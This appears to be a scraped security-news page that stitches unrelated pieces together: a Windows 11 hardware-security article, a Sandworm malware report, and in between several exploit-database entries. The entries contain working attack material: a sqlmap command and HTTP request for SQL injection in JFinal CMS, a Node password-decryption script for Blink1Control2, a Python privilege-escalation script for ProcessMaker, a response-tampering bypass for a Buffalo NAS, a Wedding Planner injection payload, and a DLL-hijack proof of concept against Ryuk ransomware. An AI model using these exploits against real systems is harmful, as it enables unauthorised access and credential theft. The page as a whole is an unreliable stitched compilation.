A stacked combination of hardware and software protects the next version of Windows against the latest generation of firmware threats.

Microsoft on Tuesday released a hefty PDF detailing Windows 11's new security-focused features, with a heavy emphasis on supporting zero trust.

For a couple of years now, Microsoft, Google, and Amazon have been working with the US federal government on improving cybersecurity through zero trust, among other techniques. It's no coincidence that these are the big three cloud service providers, of course; they are best positioned to institute controls to prevent catastrophic cyberattacks.

But Microsoft is also moving security way down the stack to where cloud rivals can't follow: firmware.

**Hardware Security Under Attack**

While network-level security is mandatory, it is not sufficient to protect against attackers who target firmware and other low-level elements of a computer.

Flaws in firmware for CPUs, printers, and other hardware can open a door to a corporate network. Malware like TrickBot, MoonBounce, and LoJax that worms its way into the silicon is difficult to dislodge.

"These new threats call for computing hardware that is secure down to the very core, including hardware chips and processors which store sensitive business information," Microsoft stated in the new report. "With hardware-based protection, we can enable strong mitigation against entire classes of vulnerabilities that are difficult to thwart with software alone." 

Besides the extra strength of the protection, Microsoft touts less slowdown using hardware-based protection versus running it in software.

The foundation of the built-in hardware security is a partnership between hardware root-of-trust and silicon-assisted security.

**Hardware Root-of-Trust**

Hardware root-of-trust is, by definition, "a starting point that is implicitly trusted." In the case of a PC, it's the part that checks BIOS code to ensure it's legitimate before it boots up. And anyone who's had to remove malware from a machine with infected BIOS knows how vital that is.

The new security measures include storing sensitive data such as cryptographic keys and user credentials isolated from the operating system within a separate secure area. Microsoft requires a Trusted Platform Module (TPM) 2.0 chip to be installed on both new and upgraded Windows 11 machines. The company had required TPM 2.0 capabilities on all new Windows 10 machines, but the latest version of Windows won't even run if the PC doesn't have a TPM 2.0 security chip.

"With hardware-based isolation security that begins at the chip, Windows 11 stores sensitive data behind additional barriers separated from the operating system," Microsoft wrote in its new report. "As a result, information including encryption keys and user credentials are protected from unauthorized access and tampering."

To provide TPM 2.0 protection directly on the motherboard, Windows 11 machines include the Microsoft Pluton security processor on the system-on-chip. While Pluton is not brand new – it was previewed back in November 2020 – integrating TPM 2.0 capabilities in this way eliminates one attack vector: the bus interface between the CPU and the TPM chip.

Not all Windows 11 machines will have a Pluton chip, but they will all have a TPM 2.0 chip.

**Silicon-Assisted Security**

The silicon-assisted security measures in Windows 11 start with a secure kernel carved out using virtualization-based security (VBS). 

"The isolated VBS environment protects processes, such as security solutions and credential managers, from other processes running in memory," Microsoft wrote. "Even if malware gains access to the main OS kernel, the hypervisor and virtualization hardware help prevent the malware from executing unauthorized code or accessing platform secrets in the VBS environment."

Hypervisor-protected code integrity (HCVI) uses VBS to check the validity of code within the secure VBS environment instead of in the main Windows kernel. Kernel mode code integrity (KMCI), as that's called, fends off attempts to modify drivers and the like. KMCI verifies that all kernel code is properly signed and has not been altered before it allows it to run. HVCI is supported in all versions of Windows 11 and enabled by default in most editions.

A further measure of protection against such attacks as memory corruption and zero-day exploits is offered by hardware-enforced stack protection. 

"Based on Controlflow Enforcement Technology (CET) from Intel and AMD Shadow Stacks, hardware-enforced stack protection is designed to protect against exploit techniques that try to hijack return addresses on the stack," Microsoft explained. The OS does this by creating a "shadow stack," set apart from other stacks, for return addresses.

To protect against physical incursions where an intruder surreptitiously installs malware from a device, Microsoft's line of Secured-core PCs will only run executables signed by "known and approved authorities," keeping external peripherals from accessing memory without authorization.

Even more firmware protection comes from Windows 11's universal implementation of the Unified Extensible Firmware Interface (UEFI) Secure Boot standard. The TPM stores a boot audit log, the Static Root of Trust for Measurement (SRTM), to check whether any attempts to subvert the boot were made.

UEFI is not unique to Windows machines, of course, but Windows 11 adds Dynamic Root of Trust for Measurement (DRTM) that checks the UEFI boot process for suspicious activity before allowing it to continue. Non-PC devices such as the Surface tablet use Firmware Attack Surface Reduction in place of DRTM.

Silicon-assisted security is part of the Pro, Pro Workstation, Enterprise, Pro Education, and Education versions of Windows 11. The Home editions will have some of these protections but not the full slate. See Microsoft's website for comparisons.

Microsoft Brings Zero Trust to Hardware in Windows 11

Final CMS 5.1.0 is vulnerable to SQL Injection.

Permalink

**POC**

First of all you should install sqlmap

you need set

*   target domain or IP
*   your cookie

the run the shell

    sqlmap -u http://targetDomainOrIP/jfinal_cms/admin/friendlylink/list  --thread 8 --batch --smart  --random-agent --data "form.orderColumn=url*&form.orderAsc=asc&attr.name=&totalRecords=10&pageNo=1&pageSize=20&length=10"  --cookie "  your cookie  " --current-db
    

Sometimes you should know that the /jfinal\_cms/ is not necessary ,you need juede the route

**principle**

you can see the code of interface /system/menu/list

    sql.append(" order by ").append(orderBy);
    

There is a sql statement directly spliced

what is more

There is no measure to prevent sql injection because sql injection is required here

**solution**

By analyzing this function point, I found that the injection of orderby is fixed, such as id, name, menu key, so you can try to use parameterized query or make a whitelist

**TEST**

    POST /jfinal_cms/admin/friendlylink/list HTTP/1.1
    Host: 172.30.48.1
    Content-Length: 96
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://172.30.48.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://172.30.48.1/jfinal_cms/admin/friendlylink/list
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: JSESSIONID=BF13B42EDFC3DEC180959D6DF143BD18; Hm_lvt_1040d081eea13b44d84a4af639640d51=1659122360; session_user="wgPmpe3hEuJWIL+I+kHtxqag1wutWsMhm6eaAgoJH0c="
    Connection: close
    
    form.orderColumn=url*&form.orderAsc=asc&attr.name=&totalRecords=10&pageNo=1&pageSize=20&length=10

CVE-2022-37204: someEXP_of_jfinal_cms/sql7.md at main · AgainstTheLight/someEXP_of_jfinal_cms

Blink1Control2 version 2.2.7 suffers from a weak password encryption vulnerability.

    // Exploit Title: Blink1Control2 2.2.7 - Weak Password Encryption// Date: 2022-08-12// Exploit Author: p1ckzi// Vendor Homepage: https://thingm.com/// Software Link: https://github.com/todbot/Blink1Control2/releases/tag/v2.2.7// Vulnerable Version: blink1control2 <= 2.2.7// Tested on: Ubuntu Linux 20.04, Windows 10, Windows 11.// CVE: CVE-2022-35513//// Description:// the blink1control2 app (versions <= 2.2.7) utilises an insecure method// of password storage which can be found by accessing the /blink1/input url// of the api server.// password ciphertext for skype logins and email are listed// and can be decrypted. example usage:// node blink1-pass-decrypt <ciphertext>#!/usr/bin/env nodeconst {ArgumentParser} = require('argparse');const simpleCrypt = require('simplecrypt');function exploit() {  const BANNER = '\033[36m\n\     _     _ _       _    _\n\    | |__ | (_)_ __ | | _/ |      _ __   __ _ ___ ___\n\    | \'_ \\| | | \'_ \\| |/ | |_____| \'_ \\ / _` / __/ __|_____\n\    | |_) | | | | | |   <| |_____| |_) | (_| \\__ \\__ |_____|\n\    |_.__/|_|_|_| |_|_|\\_|_|     | .__/ \\__,_|___|___/\n\                                 |_|\n\         _                            _\n\      __| | ___  ___ _ __ _   _ _ __ | |_\n\     / _` |/ _ \\/ __| \'__| | | | \'_ \\| __|\n\    | (_| |  __| (__| |  | |_| | |_) | |_\n\     \\__,_|\\___|\\___|_|   \\__, | .__/ \\__|\n\                          |___/|_|\033[39m';  const PARSER = new ArgumentParser({    description: 'decrypts passwords found at the /blink/input url '    + 'of the blink1control2 api server (version <= 2.2.7 ).'  });  PARSER.add_argument('ciphertext', {    help: 'encrypted password string to use', type: 'str'  });  let args = PARSER.parse_args();  // supplied ciphertext is decrypted with same salt, password, and method  // used for encryption:  try {    let crypt = simpleCrypt({      salt:     'boopdeeboop',      password: 'blink1control',      method:   'aes-192-ecb'    });    let ciphertext = args.ciphertext;    let decrypted = crypt.decrypt(ciphertext);    console.log(BANNER);    console.log('\033[32m[+] decrypted password:\033[39m');    console.log(decrypted);  }  catch (TypeError) {    console.log('\033[33m[!] the submitted hash was invalid.\033[39m');  }  finally {    process.exit(1);  }}exploit()

Blink1Control2 2.2.7 Weak Password Encryption

ProcessMaker versions prior to 3.5.4 were discovered to be susceptible to a remote privilege escalation vulnerability.

    # Exploit Title: ProcessMaker - User Profile Privilege Escalation# Description: ProcessMaker before v3.5.4 was discovered to contain insecure permissions in the user profile page. This vulnerability allows attackers to escalate normal users to Administrators. # Date: 20220822# Exploit Author: Sornram Kampeera (Sornram9254)# Vendor Homepage: https://www.processmaker.com# Software Link: https://sourceforge.net/projects/processmaker/files/ProcessMaker/# Version: ProcessMaker before v3.5.4 (Already Tested on 2.5.0, 2.5.2, 3.0 GA and 3.2.1)# Tested on: Windows 11, Debian 11 (WSL2)# CVE : CVE-2022-38577"""Privilege Escalation replication.for 2.5.0 - 3.0 GA:    1. Log in as normal user.    2. Change "USR_ROLE" on post request form when updating profile information to "PROCESSMAKER_ADMIN".    3. Refresh page to get new role.for 3.2.1 and before:    1. Log in as normal user.    2. Get Role ID by request "/sysworkflow/en/neoclassic/roles/roles_Ajax?request=rolesList&_dc={epoch_time}"    3. Get Permission ID by request "/sysworkflow/en/neoclassic/roles/data_rolesPermissions?rUID={Role_ID}&type=show"    4. Update role to escalation privileges using POST Body request:    POST /sysworkflow/en/neoclassic/roles/roles_Ajax    request=assignPermissionToRoleMultiple&ROL_UID={Role_ID}&PER_UID={PERMISSION_ID}"""#!/usr/bin/python# TODO: Optimize code [requests module], and Exception Handling.# Replace the variables USERNAME, PASSWORD, and APP_URL.import requests, json, re, argparse, sysUSER_AGENT = 'Mozilla/5.0'APP_URL = "http://localhost:9994"USERNAME = '__USER__'PASSWORD = '__PASS__'parser = argparse.ArgumentParser()parser.add_argument("action", type=str, help="Add or Delete role permission.", nargs="?", default=".")parser.add_argument("-a", "--add",      action="store_true",    help="Add role permission")parser.add_argument("-d", "--delete",   action="store_true",    help="Delete role permission")parser.add_argument("-l", "--list",     action="store_true",    help="List all roles")args = parser.parse_args()if args.add:    action = "assign"elif args.delete:    action = "delete"elif args.list:    action = "list"    print("All Permission UID")    print("View more: https://wiki.processmaker.com/3.3/Roles")    PERM_LIST = """PER_UID: 00000000000000000000000000000001, PER_CODE: PM_LOGINPER_UID: 00000000000000000000000000000002, PER_CODE: PM_SETUPPER_UID: 00000000000000000000000000000003, PER_CODE: PM_USERSPER_UID: 00000000000000000000000000000004, PER_CODE: PM_FACTORYPER_UID: 00000000000000000000000000000005, PER_CODE: PM_CASESPER_UID: 00000000000000000000000000000006, PER_CODE: PM_ALLCASESPER_UID: 00000000000000000000000000000007, PER_CODE: PM_REASSIGNCASEPER_UID: 00000000000000000000000000000008, PER_CODE: PM_REPORTSPER_UID: 00000000000000000000000000000009, PER_CODE: PM_SUPERVISORPER_UID: 00000000000000000000000000000010, PER_CODE: PM_SETUP_ADVANCEPER_UID: 00000000000000000000000000000011, PER_CODE: PM_DASHBOARDPER_UID: 00000000000000000000000000000012, PER_CODE: PM_WEBDAVPER_UID: 00000000000000000000000000000013, PER_CODE: PM_DELETECASEPER_UID: 00000000000000000000000000000014, PER_CODE: PM_EDITPERSONALINFOPER_UID: 00000000000000000000000000000015, PER_CODE: PM_FOLDERS_VIEWPER_UID: 00000000000000000000000000000016, PER_CODE: PM_FOLDERS_ADD_FOLDERPER_UID: 00000000000000000000000000000017, PER_CODE: PM_FOLDERS_ADD_FILEPER_UID: 00000000000000000000000000000018, PER_CODE: PM_CANCELCASEPER_UID: 00000000000000000000000000000019, PER_CODE: PM_FOLDER_DELETEPER_UID: 00000000000000000000000000000020, PER_CODE: PM_SETUP_LOGOPER_UID: 00000000000000000000000000000021, PER_CODE: PM_SETUP_EMAILPER_UID: 00000000000000000000000000000022, PER_CODE: PM_SETUP_CALENDARPER_UID: 00000000000000000000000000000023, PER_CODE: PM_SETUP_PROCESS_CATEGORIESPER_UID: 00000000000000000000000000000024, PER_CODE: PM_SETUP_CLEAR_CACHEPER_UID: 00000000000000000000000000000025, PER_CODE: PM_SETUP_HEART_BEATPER_UID: 00000000000000000000000000000026, PER_CODE: PM_SETUP_ENVIRONMENTPER_UID: 00000000000000000000000000000027, PER_CODE: PM_SETUP_PM_TABLESPER_UID: 00000000000000000000000000000028, PER_CODE: PM_SETUP_LOGINPER_UID: 00000000000000000000000000000029, PER_CODE: PM_SETUP_DASHBOARDSPER_UID: 00000000000000000000000000000030, PER_CODE: PM_SETUP_LANGUAGEPER_UID: 00000000000000000000000000000031, PER_CODE: PM_SETUP_SKINPER_UID: 00000000000000000000000000000032, PER_CODE: PM_SETUP_CASES_LIST_CACHE_BUILDERPER_UID: 00000000000000000000000000000033, PER_CODE: PM_SETUP_PLUGINSPER_UID: 00000000000000000000000000000034, PER_CODE: PM_SETUP_USERS_AUTHENTICATION_SOURCESPER_UID: 00000000000000000000000000000035, PER_CODE: PM_SETUP_LOGSPER_UID: 00000000000000000000000000000036, PER_CODE: PM_DELETE_PROCESS_CASESPER_UID: 00000000000000000000000000000037, PER_CODE: PM_EDITPERSONALINFO_CALENDARPER_UID: 00000000000000000000000000000038, PER_CODE: PM_UNCANCELCASEPER_UID: 00000000000000000000000000000039, PER_CODE: PM_REST_API_APPLICATIONSPER_UID: 00000000000000000000000000000040, PER_CODE: PM_EDIT_USER_PROFILE_FIRST_NAMEPER_UID: 00000000000000000000000000000041, PER_CODE: PM_EDIT_USER_PROFILE_LAST_NAMEPER_UID: 00000000000000000000000000000042, PER_CODE: PM_EDIT_USER_PROFILE_USERNAMEPER_UID: 00000000000000000000000000000043, PER_CODE: PM_EDIT_USER_PROFILE_EMAILPER_UID: 00000000000000000000000000000044, PER_CODE: PM_EDIT_USER_PROFILE_ADDRESSPER_UID: 00000000000000000000000000000045, PER_CODE: PM_EDIT_USER_PROFILE_ZIP_CODEPER_UID: 00000000000000000000000000000046, PER_CODE: PM_EDIT_USER_PROFILE_COUNTRYPER_UID: 00000000000000000000000000000047, PER_CODE: PM_EDIT_USER_PROFILE_STATE_OR_REGIONPER_UID: 00000000000000000000000000000048, PER_CODE: PM_EDIT_USER_PROFILE_LOCATIONPER_UID: 00000000000000000000000000000049, PER_CODE: PM_EDIT_USER_PROFILE_PHONEPER_UID: 00000000000000000000000000000050, PER_CODE: PM_EDIT_USER_PROFILE_POSITIONPER_UID: 00000000000000000000000000000051, PER_CODE: PM_EDIT_USER_PROFILE_REPLACED_BYPER_UID: 00000000000000000000000000000052, PER_CODE: PM_EDIT_USER_PROFILE_EXPIRATION_DATEPER_UID: 00000000000000000000000000000053, PER_CODE: PM_EDIT_USER_PROFILE_CALENDARPER_UID: 00000000000000000000000000000054, PER_CODE: PM_EDIT_USER_PROFILE_STATUSPER_UID: 00000000000000000000000000000055, PER_CODE: PM_EDIT_USER_PROFILE_ROLEPER_UID: 00000000000000000000000000000056, PER_CODE: PM_EDIT_USER_PROFILE_TIME_ZONEPER_UID: 00000000000000000000000000000057, PER_CODE: PM_EDIT_USER_PROFILE_DEFAULT_LANGUAGEPER_UID: 00000000000000000000000000000058, PER_CODE: PM_EDIT_USER_PROFILE_COSTSPER_UID: 00000000000000000000000000000059, PER_CODE: PM_EDIT_USER_PROFILE_PASSWORDPER_UID: 00000000000000000000000000000060, PER_CODE: PM_EDIT_USER_PROFILE_USER_MUST_CHANGE_PASSWORD_AT_NEXT_LOGONPER_UID: 00000000000000000000000000000061, PER_CODE: PM_EDIT_USER_PROFILE_PHOTOPER_UID: 00000000000000000000000000000062, PER_CODE: PM_EDIT_USER_PROFILE_DEFAULT_MAIN_MENU_OPTIONSPER_UID: 00000000000000000000000000000063, PER_CODE: PM_EDIT_USER_PROFILE_DEFAULT_CASES_MENU_OPTIONSPER_UID: 00000000000000000000000000000064, PER_CODE: PM_REASSIGNCASE_SUPERVISOR"""    print(PERM_LIST)    sys.exit()else:    print("Example Permission UID")    SAMPLE_PERM_LIST = """>>> PER_UID: 00000000000000000000000000000002, PER_CODE: PM_SETUP>>> PER_UID: 00000000000000000000000000000010, PER_CODE: PM_SETUP_ADVANCE>>> PER_UID: 00000000000000000000000000000033, PER_CODE: PM_SETUP_PLUGINSpython Processmaker-PoC.py --helppython Processmaker-PoC.py --listpython Processmaker-PoC.py --add 00000000000000000000000000000002python Processmaker-PoC.py --delete 00000000000000000000000000000002"""    print(SAMPLE_PERM_LIST)    sys.exit()PERMISSION_UID = args.actionloginData = "__notValidateThisFields__=[{'name':'USR_USERNAME','type':'text','label':'User','validate':'Any','required':'0'}]&"loginData += "DynaformRequiredFields=[{'name':'USR_USERNAME','type':'text','label':'User','validate':'Any','required':'0'}]&"loginData += "__DynaformName__=sysLogin&"loginData += "form[BROWSER_TIME_ZONE_OFFSET]=25200&"loginData += "form[USR_PASSWORD]=" + PASSWORD + "&"loginData += "form[USR_USERNAME]=" + USERNAME + "&"loginData += "form[USR_PASSWORD_MASK]=&"loginData += "form[USER_ENV]=workflow&"loginData += "form[USER_LANG]=en"def getResponse(rMethod, rHeaders, rUrl,rData=None):    SSL_VERIFY = False    if rMethod == 'GET':        response = requests.get(rUrl, headers=rHeaders, verify=SSL_VERIFY, allow_redirects=True)    elif rMethod == "POST":        response = requests.post(rUrl, data=rData, headers=rHeaders, verify=SSL_VERIFY, allow_redirects=True)    else:        print("Please choose correct answer")    return responsegetCookie = getResponse('POST',                        {'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': USER_AGENT, 'Connection': 'close'},                        APP_URL + '/sys/en/neoclassic/login/sysLogin',                        loginData).cookies['PHPSESSID']if getCookie is not None:    getUserID = getResponse( 'GET',                                {'User-Agent': USER_AGENT, 'Accept': '*', 'Cookie': 'PHPSESSID=' + getCookie, 'Connection': 'close'},                                APP_URL + '/sysworkflow/en/neoclassic/users/usersInit')    USER_ID = re.findall(r"USR_UID\s=\s\"(\w{32})\"", getUserID.text, re.MULTILINE)[0]    getRolesName = getResponse('POST',                                {'User-Agent': USER_AGENT, 'Accept': '*', 'Cookie': 'PHPSESSID=' + getCookie,'Content-Type' : 'application/x-www-form-urlencoded', 'Connection': 'close'},                                APP_URL + '/sysworkflow/en/neoclassic/users/usersAjax',                                'action=userData&USR_UID=' + USER_ID)                                    getRolesList = getResponse( 'GET',                                {'User-Agent': USER_AGENT, 'Accept': '*', 'Cookie': 'PHPSESSID=' + getCookie, 'Connection': 'close'},                                APP_URL + '/sysworkflow/en/neoclassic/roles/roles_Ajax?request=rolesList&_dc=')    getRolesPermission = getResponse('POST',                                {'User-Agent': USER_AGENT, 'Accept': '*', 'Cookie': 'PHPSESSID=' + getCookie, 'Connection': 'close'},                                APP_URL + '/sysworkflow/en/neoclassic/roles/data_rolesPermissions?rUID=ROLE_UID&type=show')    roleUID = re.findall(r"\"ROL_UID\":\"(\w{32})\",\"ROL_PARENT\":\"\",\"ROL_SYSTEM\":\"\w{32}\",\"SYS_CODE\":\"PROCESSMAKER\",\"ROL_CODE\":\"" + json.loads(getRolesName.text)['user']['USR_ROLE'] + "\"", getRolesList.text, re.MULTILINE)[0]def actionRoleResponse():    actionRoleStatus = getResponse('POST',                                {'User-Agent': USER_AGENT,'Content-Type': 'application/x-www-form-urlencoded','Cookie': 'PHPSESSID=' + getCookie,'Connection': 'close'},                                APP_URL + '/sysworkflow/en/neoclassic/roles/roles_Ajax',                                'request=' + action + 'PermissionToRoleMultiple&ROL_UID=' + roleUID + '&PER_UID=' + PERMISSION_UID)    return actionRoleStatus.status_codeif actionRoleResponse() == 200:    print(action.capitalize() + " role successfully.")elif actionRoleResponse() == 503:    print("Role already exists.")else:    print("Error!")

ProcessMaker Privilege Escalation

Buffalo TeraStation Network Attached Storage (NAS) version 1.66 suffers from an authentication bypass vulnerability.

    # Exploit Title: Buffalo TeraStation Network Attached Storage (NAS) 1.66 - Authentication Bypass# Date: 2022-08-11# Exploit Author: JORDAN GLOVER# Type: WEBAPPS# Platform: HARDWARE# Vendor Homepage: https://www.buffalotech.com/# Model: TeraStation Series# Firmware Version: 1.66# Tested on: Windows 10 An authentication bypass vulnerability found within the web interface of a Buffalo TeraStation Series Network Attached Storage (NAS) device, allows an unauthenticated malicious actor to gain administrative privileges.The web interface can be accessed via port 80 or 443 via a web browser. Once accessed you will be presented with a login page, that requires a username and password to gain authentication to the NAS.Using a proxy tool to intercept the request and responses, it was possible re-intercept the response and modify the JSON data, contained within the body.If you modify the "success" to 'true' and change "Pagemode" to '0', this will grant you authentication with administrator privileges, to the NAS.POC #1 Authentication FailureRequestPOST /dynamic.pl HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: application/x-www-form-urlencodedContent-Length: 45Origin: http://localhostConnection: closeReferer: http://localhost/static/index.htmlbufaction=verifyLogin&user=Jordan&password=JordanResponseHTTP/1.1 200 OKContent-type: text/htmlPragma: no-cacheCache-Control: no-store, no-cache, must-revalidateCache-Control: post-check=0, pre-check=0Expires: Thu, 01 Dec 1994 16:00:00 GMTConnection: closeDate: Mon, 30 Jun 2008 02:39:51 GMTServer: lighttpd/1.4.32Content-Length: 94{"success":false,"errors":[],"data":[{"sid":"zz69c1c4d83023374d0b786d7a5y69b0","pageMode":2}]}Incorrect Username or Password POC #2 Authentication SuccessRequestPOST /dynamic.pl HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: application/x-www-form-urlencodedContent-Length: 45Origin: http://localhostConnection: closeReferer: http://localhost/static/index.htmlbufaction=verifyLogin&user=Jordan&password=JordanIntercepted ResponseHTTP/1.1 200 OKContent-type: text/htmlPragma: no-cacheCache-Control: no-store, no-cache, must-revalidateCache-Control: post-check=0, pre-check=0Expires: Thu, 01 Dec 1994 16:00:00 GMTConnection: closeDate: Mon, 30 Jun 2008 02:39:51 GMTServer: lighttpd/1.4.32Content-Length: 94{"success":true,"errors":[],"data":[{"sid":"ag69c5f4x43093374d0c786k7a9y59h0","pageMode":0}]}Login Successful

Buffalo TeraStation Network Attached Storage (NAS) 1.66 Authentication Bypass

Trojan.Ransom.Ryuk.A ransomware looks for and executes DLLs in its current directory. Therefore, we can potentially hijack a DLL, execute our own code, and control and terminate the malware pre-encryption. Once loaded the exploit dll will check if the current directory is "C:\Windows\System32" and if not, we grab our process ID and terminate. All basic tests were conducted successfully in a virtual machine environment.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/5ac0f050f93f86e69026faea1fbb4450.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Trojan.Ransom.Ryuk.AVulnerability: Arbitrary Code ExecutionDescription: The ransomware looks for and executes DLLs in its current directory. Therefore, we can potentially hijack a vuln DLL execute our own code, control and terminate the malware pre-encryption. Once loaded the exploit dll will check if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. All basic tests were conducted successfully in a virtual machine environment.Family: RyukType: PE32MD5: 5ac0f050f93f86e69026faea1fbb4450Vuln ID: MVID-2022-0640Disclosure: 09/19/2022Exploit/PoC:1) Compile the following C code as "urlmon.dll"2) Place the DLL in same directory as the ransomware3) Optional - Hide it: attrib +s +h "urlmon.dll"4) Run the malware#include "windows.h"//By malvuln//Purpose: Exploit Ryuk/** DISCLAIMER:Author is NOT responsible for any damages whatsoever by using this software or improper malwarehandling. By using this code you assume and accept all risk implied or otherwise.**///gcc -c urlmon.c -m32//gcc -shared -o urlmon.dll urlmon.o -m32BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){  switch (reason) {  case DLL_PROCESS_ATTACH:   MessageBox(NULL, "Ryuk\nPWNED By MALVULN", "Code Exec PoC", MB_OK);   TCHAR buf[MAX_PATH];   GetCurrentDirectory(MAX_PATH, TEXT(buf));   int rc = strcmp("C:\\Windows\\System32", TEXT(buf));     if(rc != 0){     HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid());     if (NULL != handle) {           TerminateProcess(handle, 0);       CloseHandle(handle);     }   }    break;  }  return TRUE;}Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Trojan.Ransom.Ryuk.A MVID-2022-0640 Code Execution

Trojan-Dropper.Win32.Corty.10 malware suffers from an insecure credential storage vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/f72138e574743640bdcdb9f102dff0a5.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Trojan-Dropper.Win32.Corty.10Vulnerability: Insecure Credential StorageDescription: The malware stores its credentials in cleartext within the Windows registry.Family: CortyType: PE32MD5: f72138e574743640bdcdb9f102dff0a5Vuln ID: MVID-2022-0639Dropped files: TMP205880.EXEDisclosure: 09/19/2022Exploit/PoC:Computer\HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\UltraAccess Networks\NetBus Server\TelnetLogin\AdminPassword\1234Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Trojan-Dropper.Win32.Corty.10 MVID-2022-0639 Insecure Credential Storage

A threat cluster linked to the Russian nation-state actor tracked as Sandworm has continued its targeting of Ukraine with commodity malware by masquerading as telecom providers, new findings show.
Recorded Future said it discovered new infrastructure belonging to UAC-0113 that mimics operators like Datagroup and EuroTransTelecom to deliver payloads such as Colibri loader and Warzone RAT.
The

A threat cluster linked to the Russian nation-state actor tracked as Sandworm has continued its targeting of Ukraine with commodity malware by masquerading as telecom providers, new findings show.

Recorded Future said it discovered new infrastructure belonging to UAC-0113 that mimics operators like Datagroup and EuroTransTelecom to deliver payloads such as Colibri loader and Warzone RAT.

The attacks are said to be an expansion of the same campaign that previously distributed DCRat (or DarkCrystal RAT) using phishing emails with legal aid-themed lures against providers of telecommunications in Ukraine.

Sandworm is a destructive Russian threat group that's best known for carrying out attacks such as the 2015 and 2016 targeting of Ukrainian electrical grid and 2017's NotPetya attacks. It's confirmed to be Unit 74455 of Russia's GRU military intelligence agency.

The adversarial collective, also known as Voodoo Bear, sought to damage high-voltage electrical substations, computers and networking equipment for the third time in Ukraine earlier this April through a new variant of a piece of malware known as Industroyer.

Russia's invasion of Ukraine has also had the group unleash numerous other attacks, including leveraging the Follina vulnerability (CVE-2022-30190) in the Microsoft Windows Support Diagnostic Tool (MSDT) to breach media entities in the Eastern European nation.

In addition, it was uncovered as the mastermind behind a new modular botnet called Cyclops Blink that enslaved internet-connected firewall devices and routers from WatchGuard and ASUS.

The U.S. government, for its part, has announced up to $10 million in rewards for information on six hackers associated with the APT group for participating in malicious cyber activities against critical infrastructure in the country.

"A transition from DarkCrystal RAT to Colibri Loader and Warzone RAT demonstrates UAC-0113's broadening but continuing use of publicly available commodity malware," Recorded Future said.

The attacks entail the fraudulent domains hosting a web page purportedly about "Odesa Regional Military Administration," while an encoded ISO image payload is stealthily deployed via a technique referred to as HTML smuggling.

HTML smuggling, as the name goes, is an evasive malware delivery technique that leverages legitimate HTML and JavaScript features to distribute malware and get around conventional security controls.

Recorded Future also said it identified points of similarities with another HTML dropper attachment put to use by the APT29 threat actor in a campaign aimed at Western diplomatic missions between May and June 2022.

Embedded within the ISO file, which was created on August 5, 2022, are three files, including an LNK file that tricks the victim into activating the infection sequence, resulting in the deployment of both Colibri loader and Warzone RAT to the target machine.

The execution of the LNK file also launches an innocuous decoy document – an application for Ukrainian citizens to request for monetary compensation and fuel discounts – in an attempt to conceal the malicious operations.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Russian Sandworm Hackers Impersonate Ukrainian Telecoms to Distribute Malware

Wedding Planner v1.0 was discovered to contain a SQL injection vulnerability via the booking_id parameter at /admin/budget.php.

Permalink

Cannot retrieve contributors at this time

**Wedding Planner v1.0 by pushpam02 has SQL injection**

BUG\_Author: Ptanly

vendor: https://www.sourcecodester.com/php/15375/wedding-planner-project-php-free-download.html

Vulnerability File: /Wedding-Management-PHP/admin/budget.php?booking\_id=

Vulnerability url: http://ip/Wedding-Management-PHP/admin/budget.php?booking\_id=

\[+\] Payload: /Wedding-Management-PHP/admin/budget.php?booking\_id=31%20and%20length(database())%20=9&user\_id=31 // Leak place ---> booking\_id

dbname = dbwedding,length is 9

GET /Wedding\-Management\-PHP/admin/budget.php?booking\_id\=31%20and%20length(database())%20\=9&user\_id\=31 HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
